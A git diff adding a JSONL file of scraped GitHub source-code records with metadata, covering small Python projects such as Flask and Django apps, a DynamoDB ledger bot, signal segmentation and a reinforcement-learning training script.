diff --git "a/1181.jsonl" "b/1181.jsonl" new file mode 100644--- /dev/null +++ "b/1181.jsonl" @@ -0,0 +1,838 @@ +{"seq_id": "22224692881", "text": "import sqlite3, os\nSQLITE_NAME = \"fatpanda.tmp.db\"\n# if os.path.isfile(SQLITE_NAME): os.remove(SQLITE_NAME)\n\n\ndef fpd_raw_connection(db_path=SQLITE_NAME):\n conn = sqlite3.connect(db_path)\n '''Optional processing'''\n return conn\n\nfrom .readers import (\n read_csv,\n concat_csv,\n read_sql_query\n)", "repo_name": "shashfrankenstien/FatPanda", "sub_path": "fatpanda/__init__.py", "file_name": "__init__.py", "file_ext": "py", "file_size_in_byte": 311, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "sqlite3.connect", "line_number": 7, "usage_type": "call"}]} +{"seq_id": "41185222380", "text": "import json\nfrom flask import Flask\n\napp = Flask(__name__)\n\nwith open('../data/keywords_json.json', 'r') as f:\n jsondata = json.load(f)\n\n\n@app.route('/')\ndef index():\n return jsondata\n\n\nif __name__ == '__main__':\n app.run(debug=True)\n", "repo_name": "secantsquared/flaskreactapp", "sub_path": "server/app.py", "file_name": "app.py", "file_ext": "py", "file_size_in_byte": 243, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "flask.Flask", "line_number": 4, "usage_type": "call"}, {"api_name": "json.load", "line_number": 7, "usage_type": "call"}]} +{"seq_id": "10697609667", "text": "import json\nd = {\n \"vezetekNev\": \"Kovacs\",\n \"keresztNev\": \"Janos\",\n \"kor\": 25,\n \"cim\":\n {\n \"utcaHazszam\": \"2. utca 21.\",\n \"varos\": \"New York\",\n \"allam\": \"NY\",\n \"iranyitoSzam\": \"10021\"\n }\n}\nprint(json.dumps(d))\nwith open(\"dump.txt\", \"w\") as f:\n\tjson.dump(d,f)\n\n", "repo_name": "Gero4884/Gero4884", "sub_path": "json1.py", "file_name": "json1.py", "file_ext": "py", "file_size_in_byte": 316, "program_lang": "python", "lang": "hu", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "json.dumps", "line_number": 14, "usage_type": "call"}, {"api_name": "json.dump", "line_number": 16, "usage_type": "call"}]} +{"seq_id": "40233180338", "text": "from __future__ import (absolute_import, division, generators, nested_scopes, print_function,\n unicode_literals, with_statement)\n\nimport logging\nimport os\n\n# NB(zundel): these definitions are a part of the source from https://github.com/pantsbuild/pants\nfrom pants.backend.jvm.targets.exportable_jvm_library import ExportableJvmLibrary\nfrom pants.base.exceptions import TargetDefinitionException\nfrom pants.base.payload import Payload\nfrom pants.base.payload_field import PrimitiveField\n\n\nlogger = logging.getLogger(__name__)\n\nclass JaxWsLibrary(ExportableJvmLibrary):\n \"\"\"Generates a Java library from JAX-WS wsdl files.\"\"\"\n\n def __init__(self,\n payload=None,\n vm_args=None,\n xjc_args=None,\n extra_args=None,\n **kwargs):\n \"\"\"Generates a Java library from WSDL files using JAX-WS.\n\n :param list vm_args: Additional arguments for the JVM.\n :param list xjc_args: Additional arguments to xjc.\n :param list extra_args: Additional arguments for the CLI.\n \"\"\"\n payload = payload or Payload()\n payload.add_fields({\n 'vm_args': PrimitiveField(vm_args or ()),\n 'xjc_args': PrimitiveField(xjc_args or ()),\n 'extra_args': PrimitiveField(extra_args or ()),\n })\n super(JaxWsLibrary, self).__init__(payload=payload, **kwargs)\n self.add_labels('codegen')\n", 
"repo_name": "ericzundel/mvn2pants", "sub_path": "src/python/squarepants/plugins/jax_ws/targets/jax_ws_library.py", "file_name": "jax_ws_library.py", "file_ext": "py", "file_size_in_byte": 1380, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 7, "dataset": "github-code", "pt": "61", "api": [{"api_name": "logging.getLogger", "line_number": 14, "usage_type": "call"}, {"api_name": "pants.backend.jvm.targets.exportable_jvm_library.ExportableJvmLibrary", "line_number": 16, "usage_type": "name"}, {"api_name": "pants.base.payload.Payload", "line_number": 31, "usage_type": "call"}, {"api_name": "pants.base.payload_field.PrimitiveField", "line_number": 33, "usage_type": "call"}, {"api_name": "pants.base.payload_field.PrimitiveField", "line_number": 34, "usage_type": "call"}, {"api_name": "pants.base.payload_field.PrimitiveField", "line_number": 35, "usage_type": "call"}]} +{"seq_id": "42167978913", "text": "import argparse\n\nfrom game import Runner\n\nTRAPS = [(2, 2), (3, 3), (4, 4), (5, 5)]\nWIND = [0, 0, 0, 1, 1, 1, 2, 2, 1, 0]\nSTART = (3, 0)\nGOAL = (3, 7)\n\nparser = argparse.ArgumentParser(description='My script')\nparser.add_argument('-a', '--actions', help='Number of actions that agent can take (4, 8, 9')\nparser.add_argument('-e', '--episodes', help='Number of training episodes')\nparser.add_argument('-v', '--verbose', help='verbose')\nparser.add_argument('-t', '--traps', help='Number of traps 0,1,2,3,4')\n\nargs = parser.parse_args()\nactions_list = [4, 8, 9]\nif args.actions:\n actions_list = [int(args.actions)]\nepisodes = int(args.episodes or 200)\nverbose = int(args.verbose or 10)\ntraps = min(4, int(args.traps or 0))\nfor actions in actions_list:\n if actions not in [4, 8, 9]:\n raise Exception('Invalid \"-a/--actions\"')\n\nfor actions in actions_list:\n game = Runner(num_actions=actions,\n start=START,\n goal=GOAL,\n verbose=verbose,\n episodes=episodes,\n rows=7,\n cols=10,\n gamma=1,\n wind=WIND,\n traps=TRAPS[:traps],\n render_interval=[51, 50])\n game.train()\n game.test(pause=3)\n", "repo_name": "shadi-danhash/q-learning-simulation", "sub_path": "main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 1267, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 6, "dataset": "github-code", "pt": "61", "api": [{"api_name": "argparse.ArgumentParser", "line_number": 10, "usage_type": "call"}, {"api_name": "game.Runner", "line_number": 28, "usage_type": "call"}, {"api_name": "game.train", "line_number": 39, "usage_type": "call"}, {"api_name": "game.test", "line_number": 40, "usage_type": "call"}]} +{"seq_id": "37253410841", "text": "from django.core.management.base import BaseCommand\nfrom optparse import make_option\n\nfrom synnefo import quotas\n\n\nclass Command(BaseCommand):\n help = \"Detect and resolve pending commissions to Quotaholder\"\n output_transaction = True\n option_list = BaseCommand.option_list + (\n make_option(\"--fix\", dest=\"fix\",\n action='store_true',\n default=False,\n help=\"Fix pending commissions\"\n ),\n )\n\n def handle(self, *args, **options):\n fix = options['fix']\n\n accepted, rejected = quotas.resolve_pending_commissions()\n\n if accepted:\n self.stdout.write(\"Pending accepted commissions:\\n %s\\n\"\n % list_to_string(accepted))\n\n if rejected:\n self.stdout.write(\"Pending rejected commissions:\\n %s\\n\"\n % list_to_string(rejected))\n\n if fix and (accepted or rejected):\n self.stdout.write(\"Fixing pending commissions..\\n\")\n quotas.resolve_commissions(accept=accepted, 
reject=rejected,\n strict=False)\n\n\ndef list_to_string(l):\n return \",\".join([str(x) for x in l])\n", "repo_name": "mpastyl/websocket-console", "sub_path": "synnefo/snf-cyclades-app/synnefo/quotas/management/commands/reconcile-commissions-cyclades.py", "file_name": "reconcile-commissions-cyclades.py", "file_ext": "py", "file_size_in_byte": 1218, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "django.core.management.base.BaseCommand", "line_number": 7, "usage_type": "name"}, {"api_name": "django.core.management.base.BaseCommand.option_list", "line_number": 10, "usage_type": "attribute"}, {"api_name": "django.core.management.base.BaseCommand", "line_number": 10, "usage_type": "name"}, {"api_name": "optparse.make_option", "line_number": 11, "usage_type": "call"}, {"api_name": "synnefo.quotas.resolve_pending_commissions", "line_number": 21, "usage_type": "call"}, {"api_name": "synnefo.quotas", "line_number": 21, "usage_type": "name"}, {"api_name": "synnefo.quotas.resolve_commissions", "line_number": 33, "usage_type": "call"}, {"api_name": "synnefo.quotas", "line_number": 33, "usage_type": "name"}]}
+{"seq_id": "32933771056", "text": "from django.contrib import admin\nfrom . import models\nfrom django.utils.safestring import mark_safe\n\n\n# Register your models here.\n\nclass TagAdmin(admin.ModelAdmin):\n list_display = (\n 'titre',\n 'statut',\n 'date_add',\n 'date_update'\n )\n list_filter = (\n 'statut',\n 'date_add',\n 'date_update',\n )\n search_fields = (\n 'titre',\n )\n list_per_page = 50\n date_hierarchy = 'date_add'\n\n fieldsets = [\n ('Info ', {'fields': ['titre', ]}),\n ('Statut et Activations', {'fields': ['statut', ]}),\n ]\n\n\nclass CategorieAdmin(admin.ModelAdmin):\n list_display = (\n 'titre',\n 'statut',\n 'date_add',\n 'date_update'\n )\n list_filter = (\n 'statut',\n 'date_add',\n 'date_update',\n )\n search_fields = (\n 'titre',\n )\n list_per_page = 50\n date_hierarchy = 'date_add'\n\n fieldsets = [\n ('Info ', {'fields': ['titre', ]}),\n ('Statut et Activations', {'fields': ['statut', ]}),\n ]\n\n\nclass CommentaireAdmin(admin.ModelAdmin):\n\n def affiche_image(self, obj):\n if obj.cover:\n return mark_safe('<img src=\"{url}\" />'.format(url=obj.cover.url))\n\n list_display = (\n 'article',\n 'nom',\n 'email',\n 'message',\n 'affiche_image',\n 'statut',\n 'date_add',\n 'date_update'\n )\n\n list_filter = (\n 'article',\n 'statut',\n 'date_add',\n 'date_update'\n )\n search_fields = (\n 'message',\n 'date_add'\n )\n readonly_fields = ['affiche_image']\n fieldsets = [\n ('Info ', {'fields': ['article', 'nom', 'email', 'message', ]\n }),\n ('Image', {'fields': [\n 'cover',\n 'affiche_image'\n ]}),\n ('Statut et Activations', {'fields': ['statut', ]}),\n ]\n\n\nclass ArticleAdmin(admin.ModelAdmin):\n list_display = (\n 'auteur',\n 'titre',\n 'affiche_image',\n 'statut',\n 'date_add',\n 'date_update'\n )\n list_filter = (\n 'categorie',\n 'statut',\n 'tags'\n )\n search_fields = (\n 'titre',\n )\n list_per_page = 50\n date_hierarchy = 'date_add'\n readonly_fields = ['affiche_image']\n\n fieldsets = [\n ('Info ', {'fields': [\n 'auteur',\n 'titre',\n 'categorie',\n 'tags',\n 'contenu',\n 'resume'\n ]\n }),\n ('Image', {'fields': ['cover', 'affiche_image']}),\n ('Statut et Activations', {'fields': ['statut', ]}),\n ]\n\n def affiche_image(self, obj):\n return mark_safe('<img src=\"{url}\" />'.format(url=obj.cover.url))\n\n\n\n\n\ndef _register(model, admin_class):\n admin.site.register(model, 
admin_class)\n\n\n_register(models.Article, ArticleAdmin)\n_register(models.Commentaire, CommentaireAdmin)\n_register(models.Categorie, CategorieAdmin)\n_register(models.Tag, TagAdmin)\n\n\n", "repo_name": "paulemxx/Orgo", "sub_path": "blog/admin.py", "file_name": "admin.py", "file_ext": "py", "file_size_in_byte": 3041, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "django.contrib.admin.ModelAdmin", "line_number": 8, "usage_type": "attribute"}, {"api_name": "django.contrib.admin", "line_number": 8, "usage_type": "name"}, {"api_name": "django.contrib.admin.ModelAdmin", "line_number": 32, "usage_type": "attribute"}, {"api_name": "django.contrib.admin", "line_number": 32, "usage_type": "name"}, {"api_name": "django.contrib.admin.ModelAdmin", "line_number": 56, "usage_type": "attribute"}, {"api_name": "django.contrib.admin", "line_number": 56, "usage_type": "name"}, {"api_name": "django.utils.safestring.mark_safe", "line_number": 60, "usage_type": "call"}, {"api_name": "django.contrib.admin.ModelAdmin", "line_number": 95, "usage_type": "attribute"}, {"api_name": "django.contrib.admin", "line_number": 95, "usage_type": "name"}, {"api_name": "django.utils.safestring.mark_safe", "line_number": 131, "usage_type": "call"}, {"api_name": "django.contrib.admin.site.register", "line_number": 138, "usage_type": "call"}, {"api_name": "django.contrib.admin.site", "line_number": 138, "usage_type": "attribute"}, {"api_name": "django.contrib.admin", "line_number": 138, "usage_type": "name"}]}
+{"seq_id": "38191438054", "text": "# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Oct 25 13:56:35 2018\n\n@author: galaz\n\"\"\"\n\nimport pyedflib\nimport numpy as np\nimport matplotlib.pyplot as plt\nf = pyedflib.EdfReader(\"3-1-Schlucktest_Leitfaehigkeit_edited_triggerMarker_edited.bdf\")\nn = f.signals_in_file\nsignal_labels = f.getSignalLabels()\nsigbufs = np.zeros((n, f.getNSamples()[0]))\nfor i in np.arange(n):\n sigbufs[i, :] = f.readSignal(i)\n \nBI = sigbufs[0] \nEMG = sigbufs[1] \nannotations = f.readAnnotations() \nsample_frequency= 4000 \n\ndef segment(t_after,t_befor,sample_frequency,annotations,BI,EMG):\n BI_segment_list = []\n EMG_segment_list = []\n for i in range (annotations[0].size):\n BI_segment = []\n EMG_segment = []\n swallow_index= int(sample_frequency*annotations[0][i])\n segment_start =swallow_index-int(sample_frequency*t_befor)\n segment_end = swallow_index+int(sample_frequency*t_after)\n segment_length = segment_end-segment_start\n for j in range (segment_length):\n BI_segment.append(BI[segment_start+j])\n EMG_segment.append(EMG[segment_start+j])\n BI_segment_list.append(BI_segment) \n EMG_segment_list.append(EMG_segment) \n return [BI_segment_list, EMG_segment_list] \n \nresult=segment(2,0.5,4000,annotations,BI,EMG) \n\nfig = plt.figure()\nax = fig.add_subplot(111)\nnumberofsegment='123456'\n\nfor i in range(annotations[0].size):\n ax = fig.add_subplot(2,annotations[0].size,i+1)\n ax.plot(result[0][i])\n ax = fig.add_subplot(2,annotations[0].size,(annotations[0].size+i+1))\n ax.plot(result[1][i])\n ax.set_title('The: %s st'%numberofsegment[i])\n\n\n", "repo_name": "Gamil-Farea/Schluckerkennung", "sub_path": "Code/Gamil_test_V1.py", "file_name": "Gamil_test_V1.py", "file_ext": "py", "file_size_in_byte": 1642, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "pyedflib.EdfReader", "line_number": 11, "usage_type": "call"}, 
{"api_name": "numpy.zeros", "line_number": 14, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 15, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 42, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 42, "usage_type": "attribute"}]} +{"seq_id": "1640022022", "text": "from functools import lru_cache\n\n\nclass Solution:\n def minimumDistance(self, word: str) -> int:\n word_length = len(word)\n\n def distance(char_a: str, char_b: str) -> int:\n if not char_a or not char_b:\n # return 0 for the first letter\n return 0\n\n index_a = ord(char_a) - ord('A')\n index_b = ord(char_b) - ord('A')\n\n return abs(index_a // 6 - index_b // 6) + abs(index_a % 6 - index_b % 6)\n\n @lru_cache(maxsize=None)\n def find(ind: int, key_a: str, key_b: str) -> int:\n # boundary condition\n if ind == word_length:\n return 0\n\n char = word[ind]\n\n return min(\n find(ind + 1, key_a, char) + distance(key_b, char),\n find(ind + 1, char, key_b) + distance(key_a, char)\n )\n\n return find(0, None, None)\n\n\nif __name__ == '__main__':\n word = \"A\" * 300\n print(Solution().minimumDistance(word))", "repo_name": "amogchandrashekar/Leetcode", "sub_path": "Hard/Minimum Distance to Type a Word Using Two Fingers.py", "file_name": "Minimum Distance to Type a Word Using Two Fingers.py", "file_ext": "py", "file_size_in_byte": 997, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "61", "api": [{"api_name": "functools.lru_cache", "line_number": 18, "usage_type": "call"}]} +{"seq_id": "29223279208", "text": "import random\nfrom time import sleep, time\nimport starkbank\nfrom datetime import datetime, timedelta\nfrom src.authentication import user\n\nstarkbank.user = user\n\n\ninvoices = starkbank.invoice.create([\n starkbank.Invoice(\n amount=248,\n descriptions=[{'key': 'Arya', 'value': 'Not today'}],\n discounts=[{'percentage': 10, 'due': datetime.now()+timedelta(days=10)}],\n due=datetime.now()+timedelta(days=10),\n expiration=123456789,\n fine=2.5,\n interest=1.3,\n name=\"Arya Stark\",\n tags=['New sword', 'Invoice #1234'],\n tax_id=\"29.176.331/0001-69\"\n )\n])\n\nbreakpoint()", "repo_name": "RodrigoNavarroNogueira/apisdk", "sub_path": "src/teste.py", "file_name": "teste.py", "file_ext": "py", "file_size_in_byte": 634, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "starkbank.user", "line_number": 7, "usage_type": "attribute"}, {"api_name": "src.authentication.user", "line_number": 7, "usage_type": "name"}, {"api_name": "starkbank.invoice.create", "line_number": 10, "usage_type": "call"}, {"api_name": "starkbank.invoice", "line_number": 10, "usage_type": "attribute"}, {"api_name": "starkbank.Invoice", "line_number": 11, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 14, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 14, "usage_type": "name"}, {"api_name": "datetime.timedelta", "line_number": 14, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 15, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 15, "usage_type": "name"}, {"api_name": "datetime.timedelta", "line_number": 15, "usage_type": "call"}]} +{"seq_id": "28928388087", "text": "from __future__ import division\nfrom __future__ import print_function\nfrom __future__ import absolute_import\n\nimport os\nimport uuid\nimport random\nimport subprocess\n\nfrom 
argparse import ArgumentParser\n\n\ndef list_files(path_to_annotations, file_extension):\n \"\"\"Get list of files in a given directory\"\"\"\n file_list = []\n for file in os.listdir(path_to_annotations):\n if file.endswith('.' + file_extension):\n file_list.append(file)\n return file_list\n\n\ndef pick_random_images(background_dir):\n \"\"\"Return paths to randomly chosen fore/background images\"\"\"\n background_list = list_files(background_dir, 'jpg')\n background_image = os.path.join(background_dir, random.choice(background_list))\n\n return background_image\n\n\nif __name__ == '__main__':\n parser = ArgumentParser()\n parser.add_argument('--input_dir', '-i', type=str, help='directory of foreground images')\n parser.add_argument('--background_dir', '-b', type=str, help='directory of background images')\n parser.add_argument('--out_dir', '-o', type=str, help='output directory')\n args = parser.parse_args()\n\n sequence_names = []\n for item in os.listdir(args.input_dir):\n if os.path.isdir(os.path.join(args.input_dir, item)):\n sequence_names.append(item)\n\n for sequence in sequence_names:\n input = os.path.join(args.input_dir, sequence)\n background = pick_random_images(args.background_dir)\n output = os.path.join(args.out_dir, sequence)\n\n cmd = ['python', 'composite_video.py',\n '--input', input,\n '--background', background,\n '--output', output]\n\n subprocess.check_call(cmd)\n", "repo_name": "atomicguy/simulants", "sub_path": "simulants/legacy/batch_comp_videos.py", "file_name": "batch_comp_videos.py", "file_ext": "py", "file_size_in_byte": 1657, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "61", "api": [{"api_name": "os.listdir", "line_number": 16, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 25, "usage_type": "call"}, {"api_name": "os.path", "line_number": 25, "usage_type": "attribute"}, {"api_name": "random.choice", "line_number": 25, "usage_type": "call"}, {"api_name": "argparse.ArgumentParser", "line_number": 31, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 38, "usage_type": "call"}, {"api_name": "os.path.isdir", "line_number": 39, "usage_type": "call"}, {"api_name": "os.path", "line_number": 39, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 43, "usage_type": "call"}, {"api_name": "os.path", "line_number": 43, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 45, "usage_type": "call"}, {"api_name": "os.path", "line_number": 45, "usage_type": "attribute"}, {"api_name": "subprocess.check_call", "line_number": 52, "usage_type": "call"}]}
+{"seq_id": "32404734265", "text": "#pylint:disable=E1101\n\nimport random\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom torch.utils.data import Dataset, DataLoader\nfrom torch.distributions import Categorical\nimport numpy as np\nimport pandas as pd\nimport numpy as numpy\nimport matplotlib.pyplot as plt\nimport argparse\nfrom models import MyModel\nfrom math_dataset import MyDataset\n\n\ndef main():\n _i, _j, _k = 2,3,3\n dataset = MyDataset(_i,_j,_k)\n\n dtype = torch.float\n device = torch.device(\"cpu\")\n # device = torch.device(\"cuda:0\")\n\n #batch, input, hidden, output\n N, D_in, H, D_out = 10, _i+_j+_k, 16, _i*_j*_k\n msg_len = 10\n\n x, y = dataset.get_frame()\n x = torch.tensor(x, dtype=dtype, device=device)\n #x = torch.cat((x,x,x,x,x),0)\n y = torch.tensor(y, dtype=torch.long, device=device).squeeze()\n #y = torch.cat((y,y,y,y,y),0)\n print(x.size(), y.size())\n #x = 
torch.zeros(N, D_in, device=device, dtype=dtype)\n #y = torch.zeros(N, device=device, dtype=dtype)\n\n model = MyModel(D_in, H, D_out)\n #model = torch.nn.Linear(D_in, D_out)\n\n loss_fn = torch.nn.CrossEntropyLoss(reduce=None)\n optimizer = torch.optim.Adam(model.parameters(), lr=1e-2)\n\n for t in range(10001):\n if True: #reinforce\n y_pred = model(x)\n probs = F.softmax(y_pred, dim=1)\n m = Categorical(probs)\n action = m.sample()\n reward = torch.eq(action, y).to(torch.float)\n reward = (reward - reward.mean())\n loss = -m.log_prob(action) * reward\n model.zero_grad()\n loss.sum().backward()\n #loss.backward(loss)\n optimizer.step()\n \n elif True:\n y_pred = model(x)\n \n else: # supervised\n y_pred = model(x)\n loss = loss_fn(y_pred, y)\n model.zero_grad()\n loss.backward()\n optimizer.step()\n\n if t % 100 == 0:\n with torch.no_grad():\n y_pred = model(x)\n eq = torch.eq(torch.argmax(y_pred, dim=1), y)\n print(\"t: {}, acc: {}/{} = {}\".format(t, torch.sum(eq).item(), eq.numel(), torch.sum(eq).item() / eq.numel()))\n\n\n torch.save({'epoch': t,\n 'model_state_dict': model.state_dict(),\n 'optimizer_state_dict': optimizer.state_dict(),\n 'loss': loss\n }, \"checkpoints.tar\")\n\nif __name__ == \"__main__\":\n main()\n \n\n\n\n # model3 = MyModel(D_in, H, D_out)\n # optimizer = torch.optim.Adam(model.parameters(), lr=1e-4)\n # checkpoint = torch.load(\"checkpoints.tar\")\n # model.load_state_dict(checkpoint['model_state_dict'])\n # optimizer.load_state_dict(checkpoint['optimizer_state_dict'])\n # epoch = checkpoint['epoch']\n # loss = checkpoint['loss']\n\n # print(model.state_dict())\n # print(optimizer.state_dict())\n\n # PATH = \"model.pt\"\n # torch.save(model.state_dict(), PATH)\n\n # model2 = MyModel(D_in, H, D_out)\n # model.load_state_dict(torch.load(PATH))\n # model.eval() # for dropout and BN", "repo_name": "parkjunsoo91/number-communication", "sub_path": "supervised.py", "file_name": "supervised.py", "file_ext": "py", "file_size_in_byte": 3095, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "math_dataset.MyDataset", "line_number": 20, "usage_type": "call"}, {"api_name": "torch.float", "line_number": 22, "usage_type": "attribute"}, {"api_name": "torch.device", "line_number": 23, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 31, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 33, "usage_type": "call"}, {"api_name": "torch.long", "line_number": 33, "usage_type": "attribute"}, {"api_name": "models.MyModel", "line_number": 39, "usage_type": "call"}, {"api_name": "torch.nn.CrossEntropyLoss", "line_number": 42, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 42, "usage_type": "attribute"}, {"api_name": "torch.optim.Adam", "line_number": 43, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 43, "usage_type": "attribute"}, {"api_name": "torch.nn.functional.softmax", "line_number": 48, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 48, "usage_type": "name"}, {"api_name": "torch.distributions.Categorical", "line_number": 49, "usage_type": "call"}, {"api_name": "torch.eq", "line_number": 51, "usage_type": "call"}, {"api_name": "torch.float", "line_number": 51, "usage_type": "attribute"}, {"api_name": "torch.no_grad", "line_number": 70, "usage_type": "call"}, {"api_name": "torch.eq", "line_number": 72, "usage_type": "call"}, {"api_name": "torch.argmax", "line_number": 72, "usage_type": "call"}, {"api_name": 
"torch.sum", "line_number": 73, "usage_type": "call"}, {"api_name": "torch.save", "line_number": 76, "usage_type": "call"}]} +{"seq_id": "11966980442", "text": "import boto3\nimport time\nfrom datetime import date\nimport decimal\nfrom boto3.dynamodb.conditions import Key, Attr\n\nCONN = None\nTRANSACTIONS_TABLE_NAME = None\nUSERS_TABLE_NAME = None\nTRANSACTIONS_TABLE = None\nUSERS_TABLE = None\n\n\ndef open_connections_and_tables():\n global CONN\n global TRANSACTIONS_TABLE\n global USERS_TABLE\n CONN = boto3.resource('dynamodb')\n TRANSACTIONS_TABLE = CONN.Table(TRANSACTIONS_TABLE_NAME)\n USERS_TABLE = CONN.Table(USERS_TABLE_NAME)\n\n\ndef resolve_names_to_ids(names):\n ids = []\n for name in names:\n field_to_use = 'username' if name[0] == \"@\" else 'name'\n value_to_use = name[1:] if name[0] == \"@\" else name\n items = USERS_TABLE.scan(\n FilterExpression=Attr(field_to_use).eq(value_to_use)\n )[\"Items\"]\n if len(items) != 0:\n ids.append(items.pop()[\"id\"])\n else:\n ids.append(None)\n return dict(zip(names, ids))\n\n\ndef resolve_ids_to_names(ids):\n names = []\n for id in ids:\n items = USERS_TABLE.query(\n KeyConditionExpression=Key('id').eq(id),\n )[\"Items\"]\n if len(items) > 0:\n names.append(\"@{}\".format(items[0][\"username\"]) if \"username\" in items[0] else items[0][\"name\"])\n else:\n names.append(None)\n return names\n\n\ndef debit_transaction(gid, sender, receiver, amt, *, msg_id=None, description=\"\", on_hold=False):\n with decimal.localcontext(boto3.dynamodb.types.DYNAMODB_CONTEXT) as ctx:\n ctx.traps[decimal.Inexact] = False\n ctx.traps[decimal.Rounded] = False\n timestamp = ctx.create_decimal_from_float(time.time())\n item = {\n 'group_id': gid,\n 'id': msg_id,\n 'from': sender,\n 'to': receiver,\n 'amt': -abs(amt),\n 'timestamp': round(timestamp, 2),\n 'on_hold': on_hold\n }\n if description is not None and description.strip() != \"\":\n item[\"description\"] = description.strip()\n TRANSACTIONS_TABLE.put_item(Item=item)\n\n\ndef credit_transaction(gid, sender, receiver, amt, *, msg_id=None, description=\"\", on_hold=False):\n with decimal.localcontext(boto3.dynamodb.types.DYNAMODB_CONTEXT) as ctx:\n ctx.traps[decimal.Inexact] = False\n ctx.traps[decimal.Rounded] = False\n timestamp = ctx.create_decimal_from_float(time.time())\n item = {\n 'group_id': gid,\n 'id': msg_id,\n 'from': sender,\n 'to': receiver,\n 'amt': abs(amt),\n 'timestamp': round(timestamp, 2),\n 'on_hold': on_hold\n }\n if description is not None and description.strip() != \"\":\n item[\"description\"] = description.strip()\n TRANSACTIONS_TABLE.put_item(Item=item)\n\n\ndef view_account(gid, user):\n gid = int(gid)\n user = int(user)\n response = TRANSACTIONS_TABLE.query(\n Select='ALL_ATTRIBUTES',\n KeyConditionExpression=Key('group_id').eq(int(gid)) & Key('timestamp').gt(0),\n FilterExpression=(Attr('from').eq(int(user)) | Attr('to').eq(int(user))) & Attr('on_hold').ne(True)\n )\n entries = response[\"Items\"]\n account = {}\n for entry in entries:\n is_payment = entry[\"amt\"] > 0\n is_receiver = entry[\"to\"] == user\n print(entry, is_payment, is_receiver)\n\n dict_key = entry[\"from\"] if is_receiver else entry[\"to\"]\n if dict_key not in account:\n account[dict_key] = 0\n account[dict_key] = account[dict_key] + (entry[\"amt\"] * (-1 if is_receiver else 1))\n return account\n\n\ndef view_logs(gid, user_id, filter_id, esk=None):\n gid = int(gid)\n uid = int(user_id)\n fid = int(filter_id) if filter_id is not None else None\n if fid is not None:\n filter_expression = 
(Attr('from').eq(uid) & Attr('to').eq(fid)) | (Attr('from').eq(fid) & Attr('to').eq(uid))\n else:\n filter_expression = Attr('from').eq(uid) | Attr('to').eq(uid)\n entries = []\n while len(entries) < 0:\n response = TRANSACTIONS_TABLE.query(\n Select='ALL_ATTRIBUTES',\n KeyConditionExpression=Key('group_id').eq(int(gid)) & Key('timestamp').gt(0),\n FilterExpression=filter_expression,\n Limit=10,\n ExclusiveStartKey=esk\n )\n entries.extend(response[\"Items\"])\n lek = response.get(\"LastEvaluatedKey\", None)\n # break into timeframes\n\n def destructive_filter(list, callback):\n pass\n # this week\n this_week = [e for e in entries if date.fromtimestamp(e[\"timestamp\"]).isocalendar()[1] == date.today().isocalendar()[1]]\n # last week\n last_week = [e for e in entries if date.fromtimestamp(e[\"timestamp\"]).isocalendar()[1] == date.today().isocalendar()[1] - 1]\n # this month\n # last month\n\n\ndef register_user(uid, *, username=\"\", name=\"\"):\n data = {\n \"id\": int(uid)\n }\n username = username.strip()\n name = name.strip()\n if username != \"\":\n data[\"username\"] = username\n if name != \"\":\n data[\"name\"] = name\n USERS_TABLE.put_item(Item=data)\n\n\ndef find_transaction(gid, mid):\n response = TRANSACTIONS_TABLE.query(\n KeyConditionExpression=Key('group_id').eq(gid),\n FilterExpression=Attr('id').eq(mid)\n )\n try:\n return response[\"Items\"].pop()\n except IndexError:\n return None\n\n\ndef update_transaction(transaction):\n TRANSACTIONS_TABLE.put_item(Item=transaction)\n", "repo_name": "chesnutcase/ledger_bot", "sub_path": "utils/tableutils.py", "file_name": "tableutils.py", "file_ext": "py", "file_size_in_byte": 5439, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "boto3.resource", "line_number": 18, "usage_type": "call"}, {"api_name": "boto3.dynamodb.conditions.Attr", "line_number": 29, "usage_type": "call"}, {"api_name": "boto3.dynamodb.conditions.Key", "line_number": 42, "usage_type": "call"}, {"api_name": "decimal.localcontext", "line_number": 52, "usage_type": "call"}, {"api_name": "boto3.dynamodb", "line_number": 52, "usage_type": "attribute"}, {"api_name": "decimal.Inexact", "line_number": 53, "usage_type": "attribute"}, {"api_name": "decimal.Rounded", "line_number": 54, "usage_type": "attribute"}, {"api_name": "time.time", "line_number": 55, "usage_type": "call"}, {"api_name": "decimal.localcontext", 